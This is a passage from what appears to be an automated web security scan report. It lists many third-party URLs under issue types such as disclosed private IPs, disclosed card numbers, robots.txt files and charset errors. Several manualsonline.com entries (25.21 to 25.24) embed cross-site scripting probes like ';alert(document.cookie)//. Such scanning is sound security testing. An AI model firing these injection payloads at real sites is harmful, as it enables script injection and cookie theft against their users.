25.16. http://ecal.forexpros.com/common/CalendarPopup.js

25.17. http://etfdb.com/

25.18. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

25.19. http://gsgd.co.uk/sandbox/jquery/easing/

25.20. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

25.21. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

25.22. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

25.23. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

25.24. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

25.25. http://homeappliance.manualsonline.com/managemystuff.html

25.26. http://internetmailmanager.com/s/svrg.asp

25.27. http://javascript.crockford.com/jsmin.html

25.28. http://jqueryui.com/about

25.29. http://kambimagazine.blogspot.com/2007/08/malayalam-kambikathakal-kambi-kathakal.html

25.30. http://lovely-faces.com/lib/js/ModalPopups.js

25.31. http://mallustories1.blogspot.com/

25.32. http://mallustories1.blogspot.com/2008/11/malayalam-hot-stories.html

25.33. http://mallustories1.blogspot.com/2009/02/adhyanubavam.html

25.34. http://mir.aculo.us/

25.35. http://opensource.org/licenses/lgpl-license.php

25.36. http://opensource.org/licenses/mit-license.php

25.37. http://rmncdn.com/widget_cdn.html

25.38. http://rydex-sgi.com/equalweight/

25.39. http://sans.org/

25.40. http://shop.vodafone.de/scripts/jquery.cookie.pack.js

25.41. http://shop.vodafone.de/scripts/vodafone.global.js

25.42. http://slashdot.org/

25.43. http://slashdot.org/submit.pl

25.44. http://sourceforge.net/projects/winscp/

25.45. http://splunkbase.splunk.com/apps/All/4.x/App/app:PCI+App+-+Creative+Commons+Version

25.46. http://static.forexyard.com/class/modules/ajax/AjaxRequest.js

25.47. http://tipd.com/modules/jquery/js/jquery.cookie.js

25.48. http://tools.ietf.org/html/rfc3986

25.49. http://www.2600.com/

25.50. http://www.alvit.de/css-showcase/

25.51. http://www.baselinemag.com/js/s_code_relcon_new.js

25.52. http://www.baselinemag.com/js/s_code_remote_new.js

25.53. http://www.baysideeyes.com.au/referrer-information.htm

25.54. http://www.beckerortho.com/

25.55. http://www.beckerortho.com/pastfp.htm

25.56. http://www.beckerortho.com/services.htm

25.57. http://www.bibsonomy.org/

25.58. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

25.59. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

25.60. http://www.codero.com/css/screen.css

25.61. http://www.codero.com/css/style.css

25.62. http://www.codero.com/js/hoverIntent.js

25.63. http://www.csc.gatech.edu/copeland/jac/6612/info/Install-wireshark-on-MacOS.html

25.64. http://www.csc.gatech.edu/copeland/jac/6612/info/SSH-No-Password-Login.txt

25.65. http://www.csc.gatech.edu/~copeland/6612/info/Install-wireshark-on-MacOS.html

25.66. http://www.cygwin.com/

25.67. http://www.dest-unreach.org/socat/

25.68. http://www.ebooklibs.com/

25.69. http://www.ece.gatech.edu/about/contact_us.html

25.70. http://www.eecis.udel.edu/~ntp/

25.71. http://www.gatech.edu/support/legal.html

25.72. http://www.gnu.org/licenses/gpl.html

25.73. http://www.gnu.org/licenses/lgpl.html

25.74. http://www.godaddy.com/default.aspx

25.75. http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

25.76. http://www.gpg.org/

25.77. http://www.hemidemi.com/

25.78. http://www.hyves.nl/

25.79. http://www.instapaper.com/

25.80. http://www.jazdtech.com/css/favicon.ico

25.81. http://www.kledy.co.uk/modules/exp_easynews/css/easynews.css

25.82. http://www.kledy.co.uk/modules/exp_gallery/css/master.css

25.83. http://www.kledy.co.uk/modules/exp_hotnews/css/exphotnews.css

25.84. http://www.kledy.co.uk/modules/exp_newpage/css/expnewpage.css

25.85. http://www.kledy.co.uk/modules/exp_radio/css/expradio.css

25.86. http://www.kledy.de/modules/exp_gallery/css/master.css

25.87. http://www.kledy.de/modules/exp_hotnews/css/exphotnews.css

25.88. http://www.kledy.de/modules/exp_newpage/css/expnewpage.css

25.89. http://www.kledy.de/modules/exp_radio/css/expradio.css

25.90. http://www.kledy.es/modules/exp_easynews/css/easynews.css

25.91. http://www.kledy.es/modules/exp_gallery/css/master.css

25.92. http://www.kledy.es/modules/exp_hotnews/css/exphotnews.css

25.93. http://www.kledy.es/modules/exp_newpage/css/expnewpage.css

25.94. http://www.kledy.es/modules/exp_radio/css/expradio.css

25.95. http://www.kledy.it/modules/exp_easynews/css/easynews.css

25.96. http://www.kledy.it/modules/exp_gallery/css/master.css

25.97. http://www.kledy.it/modules/exp_hotnews/css/exphotnews.css

25.98. http://www.kledy.it/modules/exp_newpage/css/expnewpage.css

25.99. http://www.kledy.it/modules/exp_radio/css/expradio.css

25.100. http://www.kledy.us/modules/exp_easynews/css/easynews.css

25.101. http://www.kledy.us/modules/exp_gallery/css/master.css

25.102. http://www.kledy.us/modules/exp_hotnews/css/exphotnews.css

25.103. http://www.kledy.us/modules/exp_newpage/css/expnewpage.css

25.104. http://www.kledy.us/modules/exp_radio/css/expradio.css

25.105. http://www.klivio.com/modules/exp_hotnews/css/exphotnews.css

25.106. http://www.klivio.com/modules/exp_radio/css/expradio.css

25.107. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/jscript/prototype.js

25.108. http://www.macports.org/

25.109. http://www.manualsonline.com/privacy.html

25.110. http://www.manualsonline.com/tc.html

25.111. http://www.networksimplicity.com/openssh/

25.112. http://www.nmworkwear.de/

25.113. http://www.nmworkwear.de/index.php

25.114. http://www.ntp.org/

25.115. http://www.oit.gatech.edu/service/software-distribution/software-distribution

25.116. http://www.opensource.org/licenses

25.117. http://www.opensource.org/licenses/gpl-license.php

25.118. http://www.opensource.org/licenses/mit-license.php

25.119. http://www.orthougm.com/angelina_jolean.html

25.120. http://www.ota.org/

25.121. http://www.ota.org/contact/contact.html

25.122. http://www.ota.org/donorForm/donorform.cfm

25.123. http://www.ota.org/education_skeletal/index.html

25.124. http://www.ota.org/index.html

25.125. http://www.ota.org/international/international.html

25.126. http://www.ota.org/members_only/login_menu.cfm

25.127. http://www.ota.org/membership_dir/memdir.cfm

25.128. http://www.ota.org/policy/health_policy.html

25.129. http://www.ota.org/sitemap/sitemap.html

25.130. http://www.othawaii.com/default.asp

25.131. http://www.owneriq.com/

25.132. http://www.owneriq.com/about-us

25.133. http://www.owneriq.com/careers

25.134. http://www.owneriq.com/contact-us

25.135. http://www.owneriq.com/events

25.136. http://www.owneriq.com/images/iconError.png

25.137. http://www.owneriq.com/investors

25.138. http://www.owneriq.com/js/jquery.cookie.js

25.139. http://www.owneriq.com/management

25.140. http://www.owneriq.com/manuals-online

25.141. http://www.owneriq.com/mostiq

25.142. http://www.owneriq.com/opt-out

25.143. http://www.owneriq.com/ownership-targeting

25.144. http://www.owneriq.com/partners

25.145. http://www.owneriq.com/press

25.146. http://www.owneriq.com/press-coverage

25.147. http://www.owneriq.com/privacy-policy

25.148. http://www.owneriq.com/product-ownership-party

25.149. http://www.owneriq.com/retailers-and-manufacturers

25.150. http://www.owneriq.com/retargeting

25.151. http://www.owneriq.com/reversing-market-research

25.152. http://www.owneriq.com/rmb-account/create

25.153. http://www.owneriq.com/rmb-cabinet/read-calculator

25.154. http://www.owneriq.com/sitemap

25.155. http://www.peppernews.eu/templates/SquaretleFive/images/about.gif

25.156. http://www.pointehilton.com/toolkit/presentation/shell/hpportal/assets/js/jquery.bgiframe.js

25.157. http://www.positioniseverything.net/explorer/expandingboxbug.html

25.158. http://www.printfriendly.com/

25.159. http://www.shoppinga.de/modules/exp_hotnews/css/exphotnews.css

25.160. http://www.slackbooks.com/404.aspx

25.161. http://www.slackbooks.com/Athletic+Training

25.162. http://www.slackbooks.com/BestSellers.aspx

25.163. http://www.slackbooks.com/ContactUs.aspx

25.164. http://www.slackbooks.com/Manual+Therapy

25.165. http://www.slackbooks.com/NewTitleNotification.aspx

25.166. http://www.slackbooks.com/Orthotics+and+Prosthetics

25.167. http://www.slackbooks.com/Physical+Therapy

25.168. http://www.slackbooks.com/ShoppingCart.aspx

25.169. http://www.slackbooks.com/aclreconstuct

25.170. http://www.slackbooks.com/ccacl

25.171. http://www.slackbooks.com/ccknee

25.172. http://www.slackbooks.com/clinical+nursing+resources

25.173. http://www.slackbooks.com/default.aspx

25.174. http://www.slackbooks.com/essentialknee

25.175. http://www.slackbooks.com/favicon.ico

25.176. http://www.slackbooks.com/gastroenterology

25.177. http://www.slackbooks.com/homemodification

25.178. http://www.slackbooks.com/occupational+therapy

25.179. http://www.slackbooks.com/ophthalmic+technology

25.180. http://www.slackbooks.com/ophthalmology

25.181. http://www.slackbooks.com/orthopedics

25.182. http://www.slackbooks.com/pediatrics

25.183. http://www.slackinc.com/permissions/

25.184. http://www.slackinc.com/privacypolicy.asp

25.185. https://www.slackinc.com/reprints/order.asp

25.186. http://www.splunk.com/page/ask_expert/default/3107

25.187. http://www.splunk.com/page/company_news

25.188. http://www.splunk.com/page/events

25.189. http://www.splunk.com/page/release_rss

25.190. http://www.splunk.com/page/road_map_vote

25.191. http://www.splunk.com/services

25.192. http://www.splunk.com/solutions

25.193. http://www.splunk.com/view/

25.194. http://www.splunk.com/view/SP-CAAAAAH

25.195. http://www.splunk.com/view/SP-CAAAAH7

25.196. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC

25.197. http://www.splunk.com/view/contact-us/SP-CAAAAH7

25.198. http://www.splunk.com/view/education/SP-CAAAAH9

25.199. http://www.splunk.com/view/government/SP-CAAADSN

25.200. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA

25.201. http://www.splunk.com/view/long-tail/SP-CAAAE7F

25.202. http://www.splunk.com/view/partner-programs/SP-CAAACED

25.203. http://www.splunk.com/view/professional-services/SP-CAAABH9

25.204. http://www.splunk.com/view/resources/SP-CAAACGF

25.205. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB

25.206. http://www.splunk.com/view/services/SP-CAAAFQJ

25.207. http://www.stumpedia.com/

25.208. http://www.stunnel.org/

25.209. http://www.symbaloo.com/

25.210. http://www.thumbshots.com/

25.211. http://www.tocka.com.mk/sonovnik.php

25.212. http://www.vibrantmedia.com/about/contact.asp

25.213. http://www.w3.org/TR/html4/loose.dtd

25.214. http://www.w3.org/TR/html4/strict.dtd

25.215. http://www.w3.org/TR/html4/strict.dtd/

25.216. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

25.217. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

25.218. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

25.219. http://www7.aaos.org/education/courses/course_detail.aspx

26. Private IP addresses disclosed

26.1. http://answers.splunk.com/

26.2. http://au2m8.com/

26.3. http://au2m8.com/

26.4. https://axptravel.americanexpress.com/consumertravel/travel.do

26.5. http://current.com/

26.6. http://digg.com/

26.7. http://digg.com/submit

26.8. http://digg.com/submit

26.9. http://eisenstein.dk/loader/qt.php

26.10. https://online.americanexpress.com/myca/acctsumm/us/action

26.11. https://online.americanexpress.com/myca/logon/us/action

26.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

26.13. http://shop.vodafone.de/micropages/cookie-setting-page.htm

26.14. http://splunkbase.splunk.com/apps/All/4.x/Add-On/app:Google+Maps

26.15. http://static.ak.fbcdn.net/rsrc.php/zq/r/LfCa7NaF9mt.png

26.16. http://technorati.com/

26.17. http://tools.ietf.org/html/rfc3986

26.18. http://www.au2m8.com/favicon.ico

26.19. http://www.au2m8.com/v/

26.20. http://www.au2m8.com/v/

26.21. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

26.22. http://www.download32.com/iseu---eu-domain-availability-checker-i24769.html

26.23. http://www.facebook.com/BlackBerryZA

26.24. http://www.facebook.com/vibrantmedia

26.25. http://www.officedepot.com/

26.26. http://www.orthougm.com/nslookup.html

27. Credit card numbers disclosed

27.1. http://www.beckerortho.com/assets/pdf/Model1017.pdf

27.2. http://www.beckerortho.com/assets/pdf/pacTE.pdf

27.3. http://www.beckerortho.com/distrib.htm

27.4. http://www.download32.com/search/Array

27.5. http://www.merapakistan.com/directory/draw_list_prize_bond_draw_result_7500.html

28. Robots.txt file

28.1. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496

28.2. http://ad.de.doubleclick.net/N6514/adj/miwi/

28.3. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

28.4. http://ad.zanox.com/ppv/

28.5. http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css

28.6. http://b.voicefive.com/b

28.7. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

28.8. http://blog.freedownloadscenter.com/

28.9. http://blog.owneriq.com/

28.10. http://blogmarks.net/

28.11. http://bookmarks.yahoo.com/

28.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.13. http://buzz.yahoo.com/

28.14. http://cdn.manualsonline.com/javascript/libs-2.8.3.4.js

28.15. http://cdn.royale.spongecell.com/api/widgets/263365.js/

28.16. http://chitika.com/publishers.php

28.17. http://clk.redcated/229/go/253329229/direct

28.18. http://current.com/

28.19. http://dailyme.com/

28.20. http://demos.us.intellitxt.com/demos/lab/windows_live/flash_concepts/assets/instantAnswer/preloader.swf

28.21. http://developers.facebook.com/plugins/

28.22. http://digg.com/

28.23. http://ds.serving-sys.com/BurstingRes/CustomScripts/PL_ManuallyExpandPanelAfterScroll_728x90.js

28.24. http://dslshop.vodafone.de/eshop/pv/97444194

28.25. http://e.ligatus.com/LigatusFallback.gif

28.26. http://eisenstein.dk/loader/qt.php

28.27. http://en.wikipedia.org/wiki/MIT_License

28.28. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

28.29. http://faves.com/

28.30. http://feedburner.google.com/fb/a/mailverify

28.31. http://feeds.feedburner.com/~fc/tipd

28.32. http://friendfeed.com/

28.33. http://googleads.g.doubleclick.net/pagead/ads

28.34. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

28.35. http://hhonors1.hilton.com/en_US/hh/home_index.do

28.36. http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do

28.37. http://identi.ca/

28.38. http://imera.com.br/

28.39. http://img.constantcontact.com/lp/images/standard/spacer.gif/

28.40. http://jlinks.industrybrains.com/jsct

28.41. http://jquery.org/license

28.42. http://jqueryui.com/about

28.43. http://l.addthiscdn.com/live/t00/250lo.gif

28.44. http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

28.45. http://mail.google.com/mail/

28.46. http://malsup.com/jquery/form/

28.47. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

28.48. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

28.49. http://meyerweb.com/eric/thoughts/2007/04/14/reworked-reset/

28.50. http://multiply.com/

28.51. http://newstrust.net/

28.52. http://phonefavs.com/

28.53. http://posterous.com/

28.54. http://pulse.plaxo.com/pulse/

28.55. http://rbytes.net/design/style.css

28.56. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css

28.57. http://s7.addthis.com/static/r07/widget51.css

28.58. http://shop.vodafone.de/micropages/cookie-setting-page.htm

28.59. http://slashdot.org/

28.60. http://smaknews.com/

28.61. http://social.expression.microsoft.com/

28.62. http://social.msdn.microsoft.com/

28.63. http://social.technet.microsoft.com/

28.64. http://spe.redcated/ds/NMMRTUMISITP/FY11_Cloud_Scenario/CLD_W1DISWSSFAW_FxCDP_G_300x250_V1R1.swf

28.65. http://sphinn.com/

28.66. http://spongecell.com/api/widgets/clickthrough/263365

28.67. http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css

28.68. http://statistics.wibiya.com/SetToolbarLoad.php

28.69. http://tipd.com/

28.70. http://tools.ietf.org/html/rfc2234]

28.71. http://tracker.icerocket.com/services/gatherer.php

28.72. http://unalog.com/

28.73. http://us.blackberry.com/eng/devices/blackberrytorch.jsp

28.74. http://uselessjunk.com/article_full.php

28.75. http://vodpod.com/

28.76. http://www.ad4mat.de/ads/conbanner_bild1.php

28.77. http://www.addtoany.com/email

28.78. http://www.allvoices.com/

28.79. http://www.amazon.com/

28.80. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

28.81. http://www.bebo.com/

28.82. http://www.bibsonomy.org/

28.83. http://www.blogger.com/

28.84. http://www.bookmarks.fr/

28.85. https://www.box.net/

28.86. http://www.care2.com/news/

28.87. http://www.citeulike.org/

28.88. http://www.codylindley.com/

28.89. http://www.connotea.org/

28.90. http://www.diigo.com/

28.91. http://www.dzone.com/

28.92. http://www.fark.com/

28.93. http://www.folkd.com/

28.94. http://www.gabbr.com/

28.95. http://www.giveawayoftheday.com/

28.96. http://www.gnu.org/licenses/gpl-3.0.txt

28.97. http://www.google-analytics.com/__utm.gif

28.98. http://www.google.de/coop/cse/brand

28.99. http://www.googleadservices.com/pagead/aclk

28.100. http://www.hemidemi.com/

28.101. http://www.hyves.nl/

28.102. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

28.103. http://www.instapaper.com/

28.104. http://www.jumptags.com/

28.105. http://www.kledy.de/

28.106. http://www.linkagogo.com/

28.107. http://www.live.com/

28.108. http://www.livejournal.com/

28.109. http://www.manualsonline.com/privacy.html

28.110. http://www.microsoft.com/windows/internet-explorer/default.aspx

28.111. http://www.mindbodygreen.com/

28.112. http://www.mister-wong.com/

28.113. http://www.modalpopups.com/

28.114. http://www.mylinkvault.com/

28.115. http://www.myspace.com/

28.116. http://www.netlog.com/

28.117. http://www.netvibes.com/

28.118. http://www.newsvine.com/

28.119. http://www.nmworkwear.de/index.php

28.120. http://www.nowpublic.com/

28.121. http://www.officedepot.com/

28.122. http://www.oneview.de/

28.123. http://www.orkut.com/

28.124. http://www.orthougm.com/nslookup.html

28.125. http://www.splunk.com/themes/splunk_com/css/v5.php

28.126. http://www.vodafone.de/cookie-setting-page.html

28.127. http://www.zanox-affiliate.de/tpv/

28.128. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

28.129. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

29. Cacheable HTTPS response

29.1. https://ebus.ota.org/default.aspx

29.2. https://in.getclicky.com/

29.3. https://lct.salesforce.com/

29.4. https://secure.opinionlab.com/comment20AMX.asp

29.5. https://splunk.webex.com/mw0305l/mywebex/default.do

29.6. https://static.getclicky.com/

29.7. https://www.americanexpress.com/airlines-credit-card/

29.8. https://www.americanexpress.com/credit-card-rewards/

29.9. https://www.americanexpress.com/gift/giftcardslanding.shtml

29.10. https://www.americanexpress.com/gold-card/

29.11. https://www.americanexpress.com/no-annual-fee-credit-cards/

29.12. https://www.blackberry.com/profile/

29.13. https://www.google.com/adsense/support/bin/request.py

29.14. https://www.slackinc.com/reprints/order.asp

30. HTML does not specify charset

30.1. http://a.ligatus.com/timeout.php

30.2. http://a.tribalfusion.com/i.cid

30.3. http://a.tribalfusion.com/j.ad

30.4. http://a.tribalfusion.com/z/j.ad

30.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

30.6. http://ad.doubleclick.net/clk

30.7. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

30.8. http://amch.questionmarket.com/adscgen/st.php

30.9. http://api.tweetmeme.com/button.js

30.10. http://baselinemag.us.intellitxt.com/

30.11. http://blogmarks.net/

30.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.13. http://buzzport.gatech.edu/

30.14. http://c03.adsummos.net/a/e/s21719

30.15. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

30.16. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

30.17. http://corp.americanexpress.com/gcs/travel/us/

30.18. http://demos.spongecell.com/404.html

30.19. http://download32.us.intellitxt.com/

30.20. http://download32.us.intellitxt.com/iframescript.jsp

30.21. http://fls.doubleclick.net/activityi

30.22. http://freeengineer.org/learnUNIXin10minutes.html

30.23. https://home.americanexpress.com/home/corporations.shtml

30.24. http://in.getclicky.com/

30.25. https://in.getclicky.com/

30.26. http://info.bisk.com/MCIndex.asp

30.27. http://internetmailmanager.com/s/svrg.asp

30.28. http://javascript.crockford.com/jsmin.html

30.29. http://jqueryui.com/about

30.30. http://jqueryui.com/themeroller/

30.31. http://links.industrybrains.com/click

30.32. http://macgpg.sourceforge.net/

30.33. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

30.34. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.35. http://packetstorm.linuxsecurity.com/

30.36. http://ping.chartbeat.net/ping

30.37. http://pixel.intellitxt.com/pixel.jsp

30.38. http://rapidog.com/game-thoi-trang-bup-be-ba-by-rapidshare.html

30.39. http://searchnet.chitika.net/audience

30.40. http://spe.redcated/ds/NMMRTUMISAUB/

30.41. http://spe.redcated/ds/NMMRTUMISITP/

30.42. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

30.43. http://static.getclicky.com/

30.44. https://static.getclicky.com/

30.45. http://statistics.wibiya.com/SetToolbarLoad.php

30.46. http://system.referforex.com/processing/impressions.asp

30.47. http://t2.trackalyzer.com/trackalyze.asp

30.48. http://tags.bluekai.com/site/2956

30.49. http://urlist.info/search/Kelentik

30.50. http://uselessjunk.com/article_full.php

30.51. http://redacted/FXM/iview/211419853/direct

30.52. http://redacted/MRT/iview/264255445/direct

30.53. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

30.54. http://www.ad4mat.de/ads/banner_data.php

30.55. http://www.baselinemag.com/blank.gif

30.56. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/&hl=en&client=ca-pub-6422417422167576&adU=www.RiminiStreet.com&adT=ImageAd&gl=US&usg=AFQjCNH5RnMJStR1tz53GbCMllXhLJ0M_g/

30.57. http://www.baselinemag.com/images/marketplace-hdr-bg.gif

30.58. http://www.baselinemag.com/images/marketplace-hdr.gif

30.59. http://www.baselinemag.com/spacer.gif

30.60. http://www.beckercatalog.com/

30.61. http://www.beckeroregoncatalog.com/

30.62. http://www.beckerortho.com/

30.63. http://www.beckerortho.com/CAH_cd.asp

30.64. http://www.beckerortho.com/catalog.htm

30.65. http://www.beckerortho.com/history.htm

30.66. http://www.beckerortho.com/history/becker_history.htm

30.67. http://www.beckerortho.com/knee/training.htm

30.68. http://www.beckerortho.com/pastfp.htm

30.69. http://www.beckerortho.com/services.htm

30.70. http://www.beckerortho.com/tech.htm

30.71. http://www.beckerortho.com/thanks.htm

30.72. http://www.bitty.com/

30.73. https://www.blackberry.com/partnerzone/Forward.action

30.74. https://www.blackberry.com/partnerzone/Login.action

30.75. http://www.buscaglia.com/resources.htm

30.76. http://www.cisco.com/ipj/

30.77. http://www.cisco.com/warp/public/707/newsflash.html

30.78. http://www.csc.gatech.edu/copeland/jac/6612/info/Install-wireshark-on-MacOS.html

30.79. http://www.csc.gatech.edu/~copeland/6612/info/

30.80. http://www.csc.gatech.edu/~copeland/6612/info/Install-wireshark-on-MacOS.html

30.81. http://www.dest-unreach.org/socat/

30.82. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Smarter-Enterprise-and-NextGeneration-Web-Services/

30.83. http://www.freedownloadscenter.com/

30.84. http://www.freedownloadscenter.com/Contact_us.html

30.85. http://www.freedownloadscenter.com/Interaction/enter.php3

30.86. http://www.freedownloadscenter.com/Reviews/

30.87. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html

30.88. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

30.89. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

30.90. http://www.json.org/js.html

30.91. http://www.khabbr.com/

30.92. http://www.linkagogo.com/

30.93. http://www.linkfixerplus.com/

30.94. http://www.linuxsecurity.com/static-content/packetstorm.html

30.95. http://www.networksimplicity.com/openssh/

30.96. http://www.pgpi.org/

30.97. http://www.sitejot.com/

30.98. http://www.slackinc.com/journals.asp

30.99. http://www.slackinc.com/permissions/

30.100. http://www.slackinc.com/privacypolicy.asp

30.101. https://www.slackinc.com/reprints/order.asp

30.102. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

30.103. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

30.104. http://www.stunnel.org/

30.105. http://www.vibrantmedia.com/about/careers.asp

30.106. http://www.vibrantmedia.com/favicon.ico

30.107. http://www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.108. http://www.whselfinvest.de/banner/whsbanner.php

31. HTML uses unrecognised charset

31.1. https://secure.opinionlab.com/comment20AMX.asp

31.2. http://tools.ietf.org/html/rfc3492

31.3. http://tools.ietf.org/html/rfc3986

31.4. http://www.activeconversion.com/

31.5. http://www.ad4mat.de/ads/conbanner_bild1.php

31.6. http://www.tocka.com.mk/sonovnik.php

32. Content type incorrectly stated

32.1. http://a.ligatus.com/favicon.ico

32.2. http://a1.twimg.com/profile_images/318408304/wappenbeckum_normal.gif

32.3. http://a2.twimg.com/profile_images/272035086/Afrika_normal.gif

32.4. http://a3.twimg.com/profile_images/266810846/Foto_Marco_Rossegger_normal.GIF

32.5. http://ad.doubleclick.net/clk

32.6. http://amch.questionmarket.com/adscgen/st.php

32.7. http://api.tweetmeme.com/button.js

32.8. http://appcdn.wibiya.com/Handlers/newsticker.php

32.9. http://ar.voicefive.com/b/rc.pli

32.10. http://blogmarks.net/

32.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.12. http://c03.adsummos.net/a/e/error.ads

32.13. http://c03.adsummos.net/a/e/s21719

32.14. http://gdata.youtube.com/feeds/

32.15. http://homeappliance.manualsonline.com/proxy.class.php

32.16. http://homeappliance.manualsonline.com/regman/user/getUserBlock

32.17. http://in.getclicky.com/

32.18. https://in.getclicky.com/

32.19. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

32.20. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

32.21. http://mm.chitika.net/favicon.ico

32.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.23. https://onlineapps.ibanking-services.com/olnas/OLNASServlet/StappsApp

32.24. http://owneriq.postaffiliatepro.com/scripts/track.php

32.25. http://personalsavings.americanexpress.com/javascripts/rates.json

32.26. http://pixel.intellitxt.com/pixel.jsp

32.27. http://rt32.infolinks.com/action/doq.htm

32.28. http://rt82.infolinks.com/action/doq.htm

32.29. http://rt83.infolinks.com/action/doq.htm

32.30. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

32.31. http://static.getclicky.com/

32.32. https://static.getclicky.com/

32.33. http://survey.questionmarket.com/noauth/ktag_log.php

32.34. http://system.referforex.com/processing/impressions.asp

32.35. http://tools.cisco.com/search/display

32.36. http://track2.mybloglog.com/js/jsserv.php

32.37. http://track2.mybloglog.com/tr/urltrk.php

32.38. http://urlist.info/search/Kelentik

32.39. http://urls.api.twitter.com/1/urls/count.json

32.40. http://us.blackberry.com/favicon.ico

32.41. http://us.blackberry.com/foresee/foresee-surveydef.js

32.42. http://uselessjunk.com/article_full.php

32.43. http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt

32.44. http://videos.video-loader.com/sp/10711909126097144647865.js

32.45. http://videos.video-loader.com/sp/212119091279653321133331.js

32.46. http://videos.video-loader.com/sp/350119091292093356328905.js

32.47. http://videos.video-loader.com/sp/37211909126091178247379.js

32.48. http://videos.video-loader.com/sp/50811909125880119639927.js

32.49. http://videos.video-loader.com/sp/798119091292066790328795.js

32.50. http://videos.video-loader.com/sp/81211909126097148926263.js

32.51. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

32.52. http://widgets.etoro.com/calendar/CalendarJS.aspx

32.53. http://widgets.etoro.com/championship/ChampJS.aspx

